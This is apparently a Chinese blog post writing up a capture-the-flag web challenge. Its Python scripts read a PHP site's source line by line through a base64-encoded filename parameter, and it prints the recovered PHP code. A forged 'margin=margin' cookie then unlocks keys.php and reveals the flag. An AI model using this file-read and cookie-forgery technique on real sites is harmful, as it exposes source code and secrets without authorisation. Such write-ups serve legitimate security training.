Begin

upload successful

发现filename为keys.txt的base64加密,试着读取index.php文件

upload successful

发现能读到东西了,接下来读取整个文件

from requests import *
from base64 import *

for i in range(0,20):
    url = "http://123.206.87.240:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw"%i
    respone = get(url=url)
    print respone.text

<?php

error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>

逻辑不难,要求我们将cookie设置成margin=margin,然后在用相同的办法读取keys.php

from requests import *
from base64 import *

for i in range(0,20):
    url = "http://123.206.87.240:8002/web11/index.php?line=%d&filename=%s"%(i,b64encode("keys.php"))
    header = {
        "Cookie": "margin=margin"
    }
    res = get(url=url,headers=header)
    print res.text
<?php $key='KEY{key_keys}'; ?>

得到flag:KEY{key_keys}



web      web

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!